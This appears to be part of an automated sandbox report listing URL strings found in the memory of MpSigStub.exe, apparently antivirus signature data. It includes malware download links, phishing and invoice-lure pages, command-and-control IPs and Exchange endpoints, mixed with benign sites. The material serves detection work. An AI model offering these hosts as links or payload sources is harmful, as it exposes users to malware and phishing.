Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.tripod.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.troman.de/cmd/cmds.txt
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.ujnc.ru/js.js
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.up.com.jo/gov/lsass.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.vegascomtelecom.com/novo/get.php
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.wintask16.com/exc2.txt
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweigame.com/asp/y.js
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.xanga.com
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.xia3.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.xtzspxw.com/admin506/tt.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtoba01.hpg.com.br
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://xml.fiestappc.com/feed.php?aid=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://xuanbbs.net/bbs
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://xvive.com/twiki/b.txt
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xwjhdjylqeypyltby.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://xxx.llxxcx.cn/pv.htmwidth=0name=
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://xxx.llxxcx.cn/wm.htmwidth=0name=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://xxxxxxxxx9:8618/client/android/a.apk
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xzqpl.chujz.com/l14.gif
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://xzsite.chujz.com/soft/ad.html
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://zistiran.com/invoice-for-you/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://107.151.152.220:5658
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://1361227624.rsc.cdn77.org/v2/p2r.php?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://1591523753.rsc.cdn77.org/p2r.php?
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://abbeyfiechestere.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://accounts-c153b9bqxw.com
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://adverts-pistonheads.com/poste/action.php
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
